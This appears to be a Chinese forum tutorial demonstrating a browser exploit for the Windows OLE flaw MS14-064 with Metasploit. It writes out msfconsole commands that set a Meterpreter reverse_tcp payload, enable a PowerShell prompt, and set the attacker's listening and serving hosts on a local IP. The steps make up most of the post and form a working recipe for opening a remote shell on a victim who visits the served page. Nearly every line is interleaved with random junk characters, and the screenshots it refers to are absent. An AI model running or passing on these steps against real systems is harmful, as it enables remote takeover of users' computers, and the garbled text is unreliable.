$ v8 K, w7 X/ g5 V/ N
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
' W# r/ ]) ~9 n/ e; C) {
) U+ _; L1 O' J8 ], {
* b& x+ |9 o0 V8 ~
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: . {" z+ v) O% X; Z$ A
w" L% m$ J& d3 S8 _2 r( v
5 a: k. O& L; J* a% S5 K4 }/ n 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp8 |+ Z$ Y0 q% Z6 @( E6 d. G% F
* }7 t' V5 Z' x4 l! b1 \" e
6 J# w4 u: ]% T% q7 G% M set AllowPowershellPrompt true
4 y7 ]' u+ s" j6 ]- ~
3 g! ~9 K) T9 y2 z- y6 r; E' @; G+ L* P" v$ c( }6 r ]( D8 M
Set LHOST 192.168.0.109
) X- }7 @. ~$ Z/ |' A% W' K
8 C8 p, z5 I8 A# S8 l% E- R
1 i! |5 F5 M/ }/ h set SRVHOST 192.168.0.109
$ y" B: ~8 T7 O( p7 g& L
( Y7 M: E$ B2 k9 b' x5 p" v
' _' I u+ M m9 L Z7 _7 O$ E+ T
Set uripath share/ j( b1 [$ \% y- I
/ E9 K- e# h( F8 h, k2 m6 u7 j' ^$ L9 |* z3 p, i( {' z
Set srvport 80
4 R% a3 w% `3 d- ~/ i S
" G. n- k+ v3 y
( r5 g) X. l% x7 J q% j% t5 l
/ c9 F" D7 A7 T* p3 m. e% t" |
' F/ D5 B4 }% I
' D6 |' b. {( \5 W1 d" Z
9 V9 h& v& T/ u
8 Q# t6 |+ c% A r
- T+ n* C; P+ Z$ v" A# K+ u ! V* m! F; s% j# d8 O# [/ j
2 W! M1 g4 V5 P9 q: P5 W
- K0 f* p7 y! c
( s- L7 S Q1 o
: M5 F( w2 G! Q, T
2 R# g; c* \8 T K
& _. T, \4 f7 f$ }) p& R& U
N5 Z" Z# C; Z1 F
# j+ P& u* g- ~: c 下面我们来访问本地地址如图:$ @6 |* w E9 m0 _7 B
$ {* |6 E; x* q( j" M: i7 E: a7 n& v# e; u, P
# W; f3 w' @) Z' Q: p& k, h. Q/ i3 l
0 V: u. z, I1 R x( v7 y
' ^$ l2 r6 L/ o# O; Y
R! ]$ e w; [# l- @: V/ L
; D. l) O) J. `, R# Q" H# f
8 k- c. }/ N! s; W% y( L1 E9 {4 A$ L
) D, [9 f, ~# O% i+ l) e